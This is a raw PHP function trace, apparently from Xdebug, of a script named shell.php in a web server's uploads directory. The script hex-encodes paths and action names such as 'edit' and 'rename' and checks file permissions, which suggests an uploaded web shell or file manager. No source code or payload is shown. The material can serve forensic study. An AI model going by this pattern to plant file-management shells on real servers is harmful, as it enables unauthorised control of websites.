3 1612 1 0.055475 484544
3 1612 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1613 0 0.055504 484504 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1613 1 0.055515 484544
3 1613 R 104
3 1614 0 0.055527 484504 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1614 1 0.055538 484576
3 1614 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1615 0 0.055567 484504 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1615 1 0.055578 484544
3 1615 R 101
3 1616 0 0.055590 484504 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1616 1 0.055601 484576
3 1616 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1617 0 0.055629 484504 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1617 1 0.055640 484544
3 1617 R 108
3 1618 0 0.055653 484504 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1618 1 0.055663 484576
3 1618 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1619 0 0.055695 484512 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1619 1 0.055707 484552
3 1619 R 108
3 1620 0 0.055719 484512 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1620 1 0.055731 484584
3 1620 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1621 0 0.055760 484512 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1621 1 0.055771 484552
3 1621 R 46
3 1622 0 0.055783 484512 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1622 1 0.055795 484584
3 1622 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1623 0 0.055824 484512 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1623 1 0.055835 484552
3 1623 R 112
3 1624 0 0.055847 484512 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1624 1 0.055858 484584
3 1624 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1625 0 0.055887 484512 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1625 1 0.055899 484552
3 1625 R 104
3 1626 0 0.055911 484512 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1626 1 0.055922 484584
3 1626 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1627 0 0.055951 484520 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1627 1 0.055962 484560
3 1627 R 112
3 1628 0 0.055974 484520 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1628 1 0.055985 484592
3 1628 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1610 1 0.056013 484520
2 1610 R '7368656c6c2e706870'
2 1629 0 0.056028 484608 filemtime 0 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/shell.php'
2 1629 1 0.056041 484648
2 1629 R 1676261585
2 1630 0 0.056054 484552 date 0 /var/www/html/uploads/shell.php 128 2 'Y-m-d H:i' 1676261585
2 1630 1 0.056086 484880
2 1630 R '2023-02-12 23:13'
2 1631 0 0.056101 484736 is_writable 0 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/shell.php'
2 1631 1 0.056118 484776
2 1631 R FALSE
2 1632 0 0.056132 484736 is_readable 0 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/shell.php'
2 1632 1 0.056147 484776
2 1632 R TRUE
2 1633 0 0.056160 484736 perms 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/shell.php'
3 1634 0 0.056173 484736 fileperms 0 /var/www/html/uploads/shell.php 32 1 '/var/www/html/uploads/shell.php'
3 1634 1 0.056185 484776
3 1634 R 33204
2 A /var/www/html/uploads/shell.php 32 $p = 33204
2 A /var/www/html/uploads/shell.php 38 $i = '-'
2 A /var/www/html/uploads/shell.php 50 $i .= 'r'
2 A /var/www/html/uploads/shell.php 51 $i .= 'w'
2 A /var/www/html/uploads/shell.php 52 $i .= '-'
2 A /var/www/html/uploads/shell.php 53 $i .= 'r'
2 A /var/www/html/uploads/shell.php 54 $i .= 'w'
2 A /var/www/html/uploads/shell.php 55 $i .= '-'
2 A /var/www/html/uploads/shell.php 56 $i .= 'r'
2 A /var/www/html/uploads/shell.php 57 $i .= '-'
2 A /var/www/html/uploads/shell.php 58 $i .= '-'
2 1633 1 0.056295 484776
2 1633 R '-rw-rw-r--'
2 1635 0 0.056309 484744 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1636 0 0.056338 484744 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1636 1 0.056350 484784
3 1636 R 47
3 1637 0 0.056362 484744 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1637 1 0.056374 484816
3 1637 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1638 0 0.056404 484776 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1638 1 0.056416 484816
3 1638 R 118
3 1639 0 0.056434 484776 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1639 1 0.056446 484848
3 1639 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1640 0 0.056476 484776 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1640 1 0.056487 484816
3 1640 R 97
3 1641 0 0.056500 484776 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1641 1 0.056511 484848
3 1641 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1642 0 0.056541 484776 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1642 1 0.056552 484816
3 1642 R 114
3 1643 0 0.056564 484776 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1643 1 0.056576 484848
3 1643 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1644 0 0.056605 484784 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1644 1 0.056616 484824
3 1644 R 47
3 1645 0 0.056628 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1645 1 0.056639 484856
3 1645 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1646 0 0.056668 484784 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1646 1 0.056679 484824
3 1646 R 119
3 1647 0 0.056694 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1647 1 0.056705 484856
3 1647 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1648 0 0.056749 484784 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1648 1 0.056762 484824
3 1648 R 119
3 1649 0 0.056775 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1649 1 0.056786 484856
3 1649 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1650 0 0.056815 484784 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1650 1 0.056826 484824
3 1650 R 119
3 1651 0 0.056838 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1651 1 0.056849 484856
3 1651 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1652 0 0.056878 484792 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1652 1 0.056889 484832
3 1652 R 47
3 1653 0 0.056902 484792 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1653 1 0.056913 484864
3 1653 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1654 0 0.056942 484792 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1654 1 0.056954 484832
3 1654 R 104
3 1655 0 0.056966 484792 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1655 1 0.056977 484864
3 1655 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1656 0 0.057007 484792 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1656 1 0.057018 484832
3 1656 R 116
3 1657 0 0.057030 484792 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1657 1 0.057042 484864
3 1657 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1658 0 0.057071 484792 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1658 1 0.057082 484832
3 1658 R 109
3 1659 0 0.057094 484792 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1659 1 0.057105 484864
3 1659 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1660 0 0.057134 484800 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1660 1 0.057146 484840
3 1660 R 108
3 1661 0 0.057158 484800 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1661 1 0.057174 484872
3 1661 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1662 0 0.057204 484800 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1662 1 0.057215 484840
3 1662 R 47
3 1663 0 0.057228 484800 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1663 1 0.057239 484872
3 1663 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1664 0 0.057268 484800 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1664 1 0.057279 484840
3 1664 R 117
3 1665 0 0.057292 484800 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1665 1 0.057316 484872
3 1665 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1666 0 0.057347 484800 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1666 1 0.057359 484840
3 1666 R 112
3 1667 0 0.057371 484800 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1667 1 0.057383 484872
3 1667 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1668 0 0.057412 484808 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1668 1 0.057423 484848
3 1668 R 108
3 1669 0 0.057435 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1669 1 0.057446 484880
3 1669 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1670 0 0.057475 484808 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1670 1 0.057486 484848
3 1670 R 111
3 1671 0 0.057499 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1671 1 0.057510 484880
3 1671 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1672 0 0.057538 484808 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1672 1 0.057549 484848
3 1672 R 97
3 1673 0 0.057562 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1673 1 0.057573 484880
3 1673 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1674 0 0.057602 484808 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1674 1 0.057613 484848
3 1674 R 100
3 1675 0 0.057625 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1675 1 0.057637 484880
3 1675 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1676 0 0.057665 484824 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1676 1 0.057676 484864
3 1676 R 115
3 1677 0 0.057688 484824 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1677 1 0.057699 484896
3 1677 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1635 1 0.057728 484824
2 1635 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1678 0 0.057743 484808 hex 1 /var/www/html/uploads/shell.php 128 1 'edit'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1679 0 0.057773 484808 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1679 1 0.057784 484848
3 1679 R 101
3 1680 0 0.057797 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1680 1 0.057808 484880
3 1680 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1681 0 0.057837 484840 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1681 1 0.057848 484880
3 1681 R 100
3 1682 0 0.057860 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1682 1 0.057872 484912
3 1682 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1683 0 0.057905 484840 ord 0 /var/www/html/uploads/shell.php 19 1 'i'
3 1683 1 0.057917 484880
3 1683 R 105
3 1684 0 0.057929 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 105
3 1684 1 0.057941 484912
3 1684 R '69'
2 A /var/www/html/uploads/shell.php 19 $r .= '69'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1685 0 0.057970 484840 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1685 1 0.057981 484880
3 1685 R 116
3 1686 0 0.057993 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1686 1 0.058004 484912
3 1686 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1678 1 0.058033 484848
2 1678 R '65646974'
2 1687 0 0.058046 484808 hex 1 /var/www/html/uploads/shell.php 128 1 'shell.php'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1688 0 0.058076 484808 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1688 1 0.058088 484848
3 1688 R 115
3 1689 0 0.058100 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1689 1 0.058111 484880
3 1689 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1690 0 0.058141 484840 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1690 1 0.058152 484880
3 1690 R 104
3 1691 0 0.058164 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1691 1 0.058175 484912
3 1691 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1692 0 0.058204 484840 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1692 1 0.058216 484880
3 1692 R 101
3 1693 0 0.058228 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1693 1 0.058239 484912
3 1693 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1694 0 0.058266 484840 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1694 1 0.058278 484880
3 1694 R 108
3 1695 0 0.058290 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1695 1 0.058301 484912
3 1695 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1696 0 0.058330 484848 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1696 1 0.058341 484888
3 1696 R 108
3 1697 0 0.058355 484848 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1697 1 0.058367 484920
3 1697 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1698 0 0.058436 484848 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1698 1 0.058450 484888
3 1698 R 46
3 1699 0 0.058462 484848 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1699 1 0.058474 484920
3 1699 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1700 0 0.058503 484848 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1700 1 0.058515 484888
3 1700 R 112
3 1701 0 0.058527 484848 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1701 1 0.058538 484920
3 1701 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1702 0 0.058580 484848 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1702 1 0.058593 484888
3 1702 R 104
3 1703 0 0.058605 484848 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1703 1 0.058616 484920
3 1703 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1704 0 0.058645 484856 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1704 1 0.058656 484896
3 1704 R 112
3 1705 0 0.058668 484856 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1705 1 0.058684 484928
3 1705 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1687 1 0.058713 484856
2 1687 R '7368656c6c2e706870'
2 1706 0 0.058728 485000 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1707 0 0.058759 485000 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1707 1 0.058770 485040
3 1707 R 47
3 1708 0 0.058782 485000 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1708 1 0.058793 485072
3 1708 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1709 0 0.058823 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1709 1 0.058834 485072
3 1709 R 118
3 1710 0 0.058847 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1710 1 0.058858 485104
3 1710 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1711 0 0.058887 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1711 1 0.058898 485072
3 1711 R 97
3 1712 0 0.058910 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1712 1 0.058921 485104
3 1712 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1713 0 0.058949 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1713 1 0.058961 485072
3 1713 R 114
3 1714 0 0.058973 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1714 1 0.058984 485104
3 1714 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1715 0 0.059012 485040 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1715 1 0.059023 485080
3 1715 R 47
3 1716 0 0.059035 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1716 1 0.059046 485112
3 1716 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1717 0 0.059075 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1717 1 0.059086 485080
3 1717 R 119
3 1718 0 0.059098 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1718 1 0.059109 485112
3 1718 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1719 0 0.059138 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1719 1 0.059149 485080
3 1719 R 119
3 1720 0 0.059161 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1720 1 0.059173 485112
3 1720 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1721 0 0.059201 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1721 1 0.059212 485080
3 1721 R 119
3 1722 0 0.059224 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1722 1 0.059236 485112
3 1722 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1723 0 0.059269 485048 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1723 1 0.059281 485088
3 1723 R 47
3 1724 0 0.059293 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1724 1 0.059304 485120
3 1724 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1725 0 0.059333 485048 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1725 1 0.059344 485088
3 1725 R 104
3 1726 0 0.059356 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1726 1 0.059367 485120
3 1726 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1727 0 0.059400 485048 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1727 1 0.059412 485088
3 1727 R 116
3 1728 0 0.059424 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1728 1 0.059435 485120
3 1728 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1729 0 0.059463 485048 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1729 1 0.059475 485088
3 1729 R 109
3 1730 0 0.059487 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1730 1 0.059498 485120
3 1730 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1731 0 0.059527 485056 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1731 1 0.059538 485096
3 1731 R 108
3 1732 0 0.059550 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1732 1 0.059561 485128
3 1732 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1733 0 0.059591 485056 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1733 1 0.059601 485096
3 1733 R 47
3 1734 0 0.059613 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1734 1 0.059625 485128
3 1734 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1735 0 0.059654 485056 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1735 1 0.059665 485096
3 1735 R 117
3 1736 0 0.059676 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1736 1 0.059688 485128
3 1736 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1737 0 0.059716 485056 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1737 1 0.059727 485096
3 1737 R 112
3 1738 0 0.059739 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1738 1 0.059751 485128
3 1738 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1739 0 0.059779 485064 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1739 1 0.059790 485104
3 1739 R 108
3 1740 0 0.059802 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1740 1 0.059813 485136
3 1740 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1741 0 0.059842 485064 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1741 1 0.059853 485104
3 1741 R 111
3 1742 0 0.059865 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1742 1 0.059876 485136
3 1742 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1743 0 0.059905 485064 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1743 1 0.059915 485104
3 1743 R 97
3 1744 0 0.059927 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1744 1 0.059939 485136
3 1744 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1745 0 0.059967 485064 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1745 1 0.059978 485104
3 1745 R 100
3 1746 0 0.059990 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1746 1 0.060001 485136
3 1746 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1747 0 0.060030 485080 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1747 1 0.060041 485120
3 1747 R 115
3 1748 0 0.060053 485080 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1748 1 0.060064 485152
3 1748 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1706 1 0.060095 485080
2 1706 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1749 0 0.060111 485000 hex 1 /var/www/html/uploads/shell.php 128 1 'rename'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1750 0 0.060141 485000 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1750 1 0.060153 485040
3 1750 R 114
3 1751 0 0.060165 485000 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1751 1 0.060176 485072
3 1751 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1752 0 0.060205 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1752 1 0.060216 485072
3 1752 R 101
3 1753 0 0.060228 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1753 1 0.060239 485104
3 1753 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1754 0 0.060268 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'n'
3 1754 1 0.060279 485072
3 1754 R 110
3 1755 0 0.060292 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 110
3 1755 1 0.060303 485104
3 1755 R '6e'
2 A /var/www/html/uploads/shell.php 19 $r .= '6e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1756 0 0.060332 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1756 1 0.060343 485072
3 1756 R 97
3 1757 0 0.060355 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1757 1 0.060366 485104
3 1757 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1758 0 0.060394 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1758 1 0.060406 485080
3 1758 R 109
3 1759 0 0.060418 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1759 1 0.060429 485112
3 1759 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1760 0 0.060458 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1760 1 0.060470 485080
3 1760 R 101
3 1761 0 0.060482 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1761 1 0.060493 485112
3 1761 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1749 1 0.060522 485040
2 1749 R '72656e616d65'
2 1762 0 0.060535 485000 hex 1 /var/www/html/uploads/shell.php 128 1 'shell.php'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1763 0 0.060565 485000 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1763 1 0.060577 485040
3 1763 R 115
